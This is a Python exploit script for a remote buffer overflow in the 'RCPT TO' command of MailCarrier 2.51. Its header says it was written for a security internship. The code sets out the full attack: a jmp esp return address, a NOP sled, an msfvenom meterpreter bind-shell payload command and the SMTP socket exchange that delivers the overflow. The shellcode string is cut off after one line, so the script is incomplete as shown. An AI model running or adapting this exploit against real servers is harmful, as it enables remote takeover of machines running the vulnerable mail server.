# Exploit Title: MailCarrier 2.51 'RCPT TO' - Buffer Overflow (Remote)
# Date: 12/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage:
# Version: 2.51
# Software Link: N.A
# Contact: services[@]
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
#0x7e4456f7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
#1.) Change ip and port in code
#2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
import sys
import socket
import time
#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
shellcode = ("\x89\xe0\xda\xdf\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
buffer = "A" * 5090 + "\xf7\x56\x44\x7e" + "\x90" * 20 + shellcode + "B" * 100
print "[*] Sending pwnage buffer: with %s bytes" %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("", 25))
print s.recv(1024)
s.send('EHLO \r\n')
print s.recv(1024)
s.send('MAIL FROM: \r\n')
print s.recv(1024)
s.send('RCPT TO: '+ buffer + '\r\n')
print s.recv(1024)
print "[*] Done, but if you get here the exploit failed!"